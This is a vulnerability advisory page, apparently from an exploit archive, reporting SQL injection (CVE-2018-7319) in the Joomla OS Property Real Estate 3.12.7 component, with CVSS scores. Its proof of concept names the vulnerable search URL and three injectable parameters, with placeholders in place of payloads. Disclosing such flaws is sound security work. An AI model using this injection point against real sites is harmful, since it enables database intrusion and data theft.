Joomla! Component OS Property Real Estate 3.12.7 SQL Injection

2018.02.23
Credit: Ihsan Sencan
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# # # # # Exploit Title: Joomla! Component OS Property Real Estate 3.12.7 - SQL Injection # Dork: N/A # Date: 22.02.2018 # Vendor Homepage: https://www.joomdonation.com/ # Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/os-property/ # Version: 3.12.7 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2018-7319 # # # # # Exploit Author: Ihsan Sencan # # # # # # POC: # # 1) # http://localhost/[PATH]/os-property-layouts/search-tools/advanced-search?&option=com_osproperty&task=property_advsearch # &cooling_system1=[SQL] # &heating_system1=[SQL] # &laundry=[SQL] # # # # #


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top